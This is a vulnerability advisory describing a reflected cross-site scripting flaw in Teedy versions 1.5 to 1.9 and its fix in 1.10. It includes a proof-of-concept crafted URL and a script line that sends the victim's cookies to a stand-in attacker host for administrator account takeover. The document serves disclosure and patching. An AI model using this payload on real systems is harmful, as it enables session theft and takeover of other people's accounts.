Mend Vulnerability Database
What is a CVE vulnerability ID? What is a WS vulnerability ID?New vulnerability? Tell us about it!
We found results for “”
Date: January 10, 2022
OverviewIn Teedy, versions v1.5 through v1.9 are vulnerable to Reflected Cross-Site Scripting (XSS). The “search term" search functionality is not sufficiently sanitized while displaying the results of the search, which can be leveraged to inject arbitrary scripts. These scripts are executed in a victim’s browser when they enter the crafted URL. In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator. The injected scripts can extract the Session ID, which can lead to full Account Takeover of the administrator, by an unauthenticated attacker.
As the admin, paste the malicious URL in the browser and hit enter to refresh the page and notice that XSS is triggered and the cookies are sent to the attackers' server.
As the attacker, you can now use the Administrator’s cookies to take over their account.
// Malicious URL the admin clicks on: http://vulnerable.teedy.com:8080/#/document/search/%3Cscript~2Fsrc=~2F~2Fxss.tst~2Fx.js%3E%3C~2Fscript%3E // x.js file contents hosted on xss.tst server: alert(document.cookie); fetch('http://attacker.com:9999/cookies= '+ document.cookie);
Affected EnvironmentsTeedy v1.5 through v1.9
PreventionUpdate to Teedy v1.10
Good to know:
|Attack Vector (AV):||Network|
|Attack Complexity (AC):||Low|
|Privileges Required (PR):||None|
|User Interaction (UI):||Required|
|Access Vector (AV):||Network|
|Access Complexity (AC):||Medium|